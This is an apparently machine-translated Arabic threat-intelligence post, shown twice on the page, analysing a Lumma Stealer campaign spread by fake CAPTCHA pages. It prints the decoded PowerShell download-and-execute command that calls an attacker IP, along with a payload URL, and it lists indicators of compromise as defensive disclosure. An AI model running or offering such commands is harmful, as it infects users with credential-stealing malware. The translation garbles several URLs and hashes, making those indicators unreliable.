🚀 لقد رفعت CloudSek جولة B1 من السلسلة B1 بقيمة 19 مليون دولار - تعزيز مستقبل الأمن السيبراني التنبؤي
استخبارات الخصم
5
mins read

كشف الخطر: يستغل برنامج Lumma Stealer الضار صفحات CAPTCHA المزيفة

يتم توزيع برنامج Lumma Stealer الضار من خلال صفحات التحقق البشرية الخادعة التي تخدع المستخدمين لتشغيل أوامر PowerShell الضارة. تستهدف حملة التصيد الاحتيالي هذه بشكل أساسي مستخدمي Windows ويمكن أن تؤدي إلى سرقة المعلومات الحساسة.

كلاودسك ترياد
September 19, 2024
Green Alert
Last Update posted on
August 21, 2025

Schedule a Demo
Table of Contents
Author(s)
No items found.

الفئة: استخبارات الخصم

الصناعة: متعددة

التحفيز: الجرائم الإلكترونية/المالية

المنطقة: عالمي

أعلى: أخضر

ملخص تنفيذي

تم الكشف عن طريقة جديدة ومتطورة لتوزيع برامج Lumma Stealer الضارة، والتي تستهدف مستخدمي Windows من خلال صفحات التحقق البشرية الخادعة. هذه التقنية، التي اكتشفتها Unit42 في البداية في Palo Alto Networks، دفعت إلى مزيد من التحقيق في مواقع ضارة مماثلة.

بعد تحقيقنا، حددنا المزيد من المواقع الضارة النشطة التي تنشر Lumma Stealer. من المهم ملاحظة أنه على الرغم من استخدام هذه التقنية حاليًا لتوزيع Lumma Stealer، فمن المحتمل الاستفادة منها لتقديم أي نوع من البرامج الضارة للمستخدمين غير المرتابين.

تدفق حملة التصيد الاحتيالي والعدوى بالبرامج الضارة

التحليل والإسناد

طريقة العمل

تقوم الجهات الفاعلة في مجال التهديد بإنشاء مواقع التصيد الاحتيالي المستضافة على العديد من مقدمي الخدمات، وغالبًا ما تستخدم شبكات توصيل المحتوى (CDNs). تقدم هذه المواقع للمستخدمين صفحة Google CAPTCHA وهمية.

  • عند النقر على زر «التحقق»، يتم تقديم تعليمات غير عادية للمستخدمين: بعض النصوص
    • افتح مربع حوار التشغيل (Win+R)
    • اضغط على Ctrl+V
    • اضغط على Enter
  • دون علم المستخدم، يقوم هذا الإجراء بتنفيذ وظيفة JavaScript مخفية تقوم بنسخ أمر PowerShell المشفر base64 إلى الحافظة.
  • يقوم أمر PowerShell، عند تنفيذه، بتنزيل برنامج Lumma Stealer الضار من خادم بعيد.

التحليل الفني

حدد فريق البحث لدينا نطاقات متعددة تستضيف صفحات التحقق الضارة هذه. عادةً ما تتبع سلسلة العدوى هذا النمط:

  • يزور المستخدم صفحة التحقق المزيفة
صفحة التصيد الاحتيالي تطالب بمطالبة التحقق المخادعة من Google Captcha

  • يتم نسخ البرنامج النصي PowerShell على الحافظة من خلال النقر على زر «أنا لست روبوتًا». بمجرد فحص الكود المصدري لمواقع التصيد الاحتيالي، يمكن أيضًا الكشف عن الأمر الذي يتم نسخه.
خطوات التحقق التي تطلبها المواقع الخادعة


  • بمجرد أن يقوم المستخدم بلصق أمر PowerShell في مربع حوار التشغيل، سيقوم بتشغيل PowerShell في نافذة مخفية وتنفيذ الأمر المشفر Base64: بوويرشيل -w مخفي -eC
  • الأمر Base64 الذي تم فك تشفيره، iex (iwr http://165.227.121.41/a.txt - استخدم التحليل الأساسي). المحتوى، سيتم جلب المحتوى من ملف a.txt المستضاف على الخادم البعيد. سيتم بعد ذلك تحليل هذا المحتوى وتنفيذه باستخدام Invoke-Expression.
  • يحتوي ملف a.txt على أوامر إضافية لتنزيل Lumma Stealer على جهاز الضحية، ويتم استضافته على: https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip 

مزيد من الأوامر على a.txt لتنزيل الملف الضار

  • إذا تم استخراج الملف الذي تم تنزيله (dengo.zip) وتنفيذه على جهاز يعمل بنظام Windows، فسيصبح Lumma Stealer جاهزًا للعمل ويقيم اتصالات مع المجالات التي يتحكم فيها المهاجم.

ملاحظات بارزة

  • تم العثور على صفحات ضارة على منصات مختلفة، بما في ذلك حاويات Amazon S3 وموفري CDN
  • يوضح استخدام ترميز base64 والتلاعب بالحافظة جهود المهاجمين للتهرب من الاكتشاف
  • غالبًا ما يقوم الملف التنفيذي الأولي بتنزيل مكونات إضافية، مما يعقد التحليل ويحتمل أن يسمح بالوظائف المعيارية
  • على الرغم من أن هذه الحملة تستهدف بشكل أساسي توزيع برامج Lumma Stealer الضارة، إلا أنها تنطوي على إمكانية خداع المستخدمين لتنزيل أنواع مختلفة من الملفات الضارة على أجهزة Windows الخاصة بهم.

التوصيات

  • قم بتثقيف الموظفين/المستخدمين حول هذا التكتيك الجديد للهندسة الاجتماعية، مع التأكيد على خطر نسخ الأوامر غير المعروفة ولصقها.
  • قم بتنفيذ وصيانة حلول حماية نقاط النهاية القوية القادرة على اكتشاف الهجمات المستندة إلى PowerShell وحظرها.
  • راقب حركة مرور الشبكة للاتصالات المشبوهة بالنطاقات المسجلة حديثًا أو غير الشائعة.
  • قم بتحديث جميع الأنظمة وتصحيحها بانتظام للتخفيف من نقاط الضعف المحتملة التي تستغلها البرامج الضارة Lumma Stealer.

عناوين URL المزيفة الضارة

  • hxxps [://] هيروليك-جيني-2b372e [.] netlify [.] التطبيق/الرجاء التحقق من [.] html
  • hxxps [://] ملفات تعريف الارتباط [.] b-cdn [.] net/يرجى التحقق من [.] html
  • hxxps [://] sdkjhfdsknck [.] s3 [.] amazonaws [.] com/human-verify-system [.] html
  • hxxps [://] تحقق من human476 [.] b-cdn [.] net/نظام التحقق البشري [.] html
  • hxxps [://] pub-9c4ec7f3f95c448b85e464d2b533aac1 [.] r2 [.] نظام التطوير/التحقق البشري [.] html
  • hxxps [://] تحقق من human476 [.] b-cdn [.] net/نظام التحقق البشري [.] html
  • hxxps [://] مناطق فيديو جديدة [.] انقر/تحقق من [.] html
  • hxxps [://] ch3 [.] dlvideosfree [.] انقر/نظام التحقق البشري [.] html
  • hxxps [://] مناطق فيديو جديدة [.] انقر/تحقق من [.] html
  • انقر فوق hxps [://] أوفسيتفير [.]

النوع | الاسم | القيمة

ملف | dengo.zip | 7c348f51d383d6587e2be2beac5ff79be2e66c31d7

IP | خادم التنزيل IP | 165.227.121.41

ملف بي إكسيك | tr7 | e002696bb7d57315b352844cebc031e18e89f29e

ملف تنفيذي خاص بـ PE | المجلد الثاني | 766c266506918b467bf35db701c9b0954a616b58

المراجع

الملحق

صفحة Lumma Stealer للبرامج الضارة كخدمة

Author

كلاودسك ترياد

قسم أبحاث التهديدات وتحليلات المعلومات في CloudSek

Predict Cyber threats against your organization

Schedule a Demo
Related Posts
No items found.

انضم إلى أكثر من 10,000 مشترك

تابع آخر الأخبار حول سلالات البرامج الضارة، وأساليب التصيد الاحتيالي،
مؤشرات التسوية وتسريب البيانات.

Take action now

Secure your organisation with our Award winning Products

CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.

CloudSEK XVigil

Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.

Learn more about XVigil
CloudSEK SVigil

Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.

Learn more about SVigil
CloudSEK SVigil

Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.

Learn more about BeVigil Ent
CloudSEK BeVigil

Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.

Learn more about BeVigil
ذكاء البرامج الضارة

كشف الخطر: يستغل برنامج Lumma Stealer الضار صفحات CAPTCHA المزيفة

يتم توزيع برنامج Lumma Stealer الضار من خلال صفحات التحقق البشرية الخادعة التي تخدع المستخدمين لتشغيل أوامر PowerShell الضارة. تستهدف حملة التصيد الاحتيالي هذه بشكل أساسي مستخدمي Windows ويمكن أن تؤدي إلى سرقة المعلومات الحساسة.
September 19, 2024
5
min
Table of Content
Example H2

الفئة: استخبارات الخصم

الصناعة: متعددة

التحفيز: الجرائم الإلكترونية/المالية

المنطقة: عالمي

أعلى: أخضر

ملخص تنفيذي

تم الكشف عن طريقة جديدة ومتطورة لتوزيع برامج Lumma Stealer الضارة، والتي تستهدف مستخدمي Windows من خلال صفحات التحقق البشرية الخادعة. هذه التقنية، التي اكتشفتها Unit42 في البداية في Palo Alto Networks، دفعت إلى مزيد من التحقيق في مواقع ضارة مماثلة.

بعد تحقيقنا، حددنا المزيد من المواقع الضارة النشطة التي تنشر Lumma Stealer. من المهم ملاحظة أنه على الرغم من استخدام هذه التقنية حاليًا لتوزيع Lumma Stealer، فمن المحتمل الاستفادة منها لتقديم أي نوع من البرامج الضارة للمستخدمين غير المرتابين.

تدفق حملة التصيد الاحتيالي والعدوى بالبرامج الضارة

التحليل والإسناد

طريقة العمل

تقوم الجهات الفاعلة في مجال التهديد بإنشاء مواقع التصيد الاحتيالي المستضافة على العديد من مقدمي الخدمات، وغالبًا ما تستخدم شبكات توصيل المحتوى (CDNs). تقدم هذه المواقع للمستخدمين صفحة Google CAPTCHA وهمية.

  • عند النقر على زر «التحقق»، يتم تقديم تعليمات غير عادية للمستخدمين: بعض النصوص
    • افتح مربع حوار التشغيل (Win+R)
    • اضغط على Ctrl+V
    • اضغط على Enter
  • دون علم المستخدم، يقوم هذا الإجراء بتنفيذ وظيفة JavaScript مخفية تقوم بنسخ أمر PowerShell المشفر base64 إلى الحافظة.
  • يقوم أمر PowerShell، عند تنفيذه، بتنزيل برنامج Lumma Stealer الضار من خادم بعيد.

التحليل الفني

حدد فريق البحث لدينا نطاقات متعددة تستضيف صفحات التحقق الضارة هذه. عادةً ما تتبع سلسلة العدوى هذا النمط:

  • يزور المستخدم صفحة التحقق المزيفة
صفحة التصيد الاحتيالي تطالب بمطالبة التحقق المخادعة من Google Captcha

  • يتم نسخ البرنامج النصي PowerShell على الحافظة من خلال النقر على زر «أنا لست روبوتًا». بمجرد فحص الكود المصدري لمواقع التصيد الاحتيالي، يمكن أيضًا الكشف عن الأمر الذي يتم نسخه.
خطوات التحقق التي تطلبها المواقع الخادعة


  • بمجرد أن يقوم المستخدم بلصق أمر PowerShell في مربع حوار التشغيل، سيقوم بتشغيل PowerShell في نافذة مخفية وتنفيذ الأمر المشفر Base64: بوويرشيل -w مخفي -eC
  • الأمر Base64 الذي تم فك تشفيره، iex (iwr http://165.227.121.41/a.txt - استخدم التحليل الأساسي). المحتوى، سيتم جلب المحتوى من ملف a.txt المستضاف على الخادم البعيد. سيتم بعد ذلك تحليل هذا المحتوى وتنفيذه باستخدام Invoke-Expression.
  • يحتوي ملف a.txt على أوامر إضافية لتنزيل Lumma Stealer على جهاز الضحية، ويتم استضافته على: https://downcheck.nyc3[.]cdn[.]digitaloceanspaces.com/dengo.zip 

مزيد من الأوامر على a.txt لتنزيل الملف الضار

  • إذا تم استخراج الملف الذي تم تنزيله (dengo.zip) وتنفيذه على جهاز يعمل بنظام Windows، فسيصبح Lumma Stealer جاهزًا للعمل ويقيم اتصالات مع المجالات التي يتحكم فيها المهاجم.

ملاحظات بارزة

  • تم العثور على صفحات ضارة على منصات مختلفة، بما في ذلك حاويات Amazon S3 وموفري CDN
  • يوضح استخدام ترميز base64 والتلاعب بالحافظة جهود المهاجمين للتهرب من الاكتشاف
  • غالبًا ما يقوم الملف التنفيذي الأولي بتنزيل مكونات إضافية، مما يعقد التحليل ويحتمل أن يسمح بالوظائف المعيارية
  • على الرغم من أن هذه الحملة تستهدف بشكل أساسي توزيع برامج Lumma Stealer الضارة، إلا أنها تنطوي على إمكانية خداع المستخدمين لتنزيل أنواع مختلفة من الملفات الضارة على أجهزة Windows الخاصة بهم.

التوصيات

  • قم بتثقيف الموظفين/المستخدمين حول هذا التكتيك الجديد للهندسة الاجتماعية، مع التأكيد على خطر نسخ الأوامر غير المعروفة ولصقها.
  • قم بتنفيذ وصيانة حلول حماية نقاط النهاية القوية القادرة على اكتشاف الهجمات المستندة إلى PowerShell وحظرها.
  • راقب حركة مرور الشبكة للاتصالات المشبوهة بالنطاقات المسجلة حديثًا أو غير الشائعة.
  • قم بتحديث جميع الأنظمة وتصحيحها بانتظام للتخفيف من نقاط الضعف المحتملة التي تستغلها البرامج الضارة Lumma Stealer.

عناوين URL المزيفة الضارة

  • hxxps [://] هيروليك-جيني-2b372e [.] netlify [.] التطبيق/الرجاء التحقق من [.] html
  • hxxps [://] ملفات تعريف الارتباط [.] b-cdn [.] net/يرجى التحقق من [.] html
  • hxxps [://] sdkjhfdsknck [.] s3 [.] amazonaws [.] com/human-verify-system [.] html
  • hxxps [://] تحقق من human476 [.] b-cdn [.] net/نظام التحقق البشري [.] html
  • hxxps [://] pub-9c4ec7f3f95c448b85e464d2b533aac1 [.] r2 [.] نظام التطوير/التحقق البشري [.] html
  • hxxps [://] تحقق من human476 [.] b-cdn [.] net/نظام التحقق البشري [.] html
  • hxxps [://] مناطق فيديو جديدة [.] انقر/تحقق من [.] html
  • hxxps [://] ch3 [.] dlvideosfree [.] انقر/نظام التحقق البشري [.] html
  • hxxps [://] مناطق فيديو جديدة [.] انقر/تحقق من [.] html
  • انقر فوق hxps [://] أوفسيتفير [.]

النوع | الاسم | القيمة

ملف | dengo.zip | 7c348f51d383d6587e2be2beac5ff79be2e66c31d7

IP | خادم التنزيل IP | 165.227.121.41

ملف بي إكسيك | tr7 | e002696bb7d57315b352844cebc031e18e89f29e

ملف تنفيذي خاص بـ PE | المجلد الثاني | 766c266506918b467bf35db701c9b0954a616b58

المراجع

الملحق

صفحة Lumma Stealer للبرامج الضارة كخدمة
كلاودسك ترياد
قسم أبحاث التهديدات وتحليلات المعلومات في CloudSek

قسم أبحاث التهديدات وتحليلات المعلومات في CloudSek

Related Blogs

ذكاء البرامج الضارة
March 25, 2025
6
min
منشئو YouTube تحت الحصار مرة أخرى: تقنية Clickflix تغذي هجمات البرامج الضارة
Read more
استخبارات الخصم
September 19, 2024
5
min
كشف الخطر: يستغل برنامج Lumma Stealer الضار صفحات CAPTCHA المزيفة
Read more
ذكاء البرامج الضارة
September 16, 2022
min
تحطيم الأرقام القياسية: عودة الراكون
Read more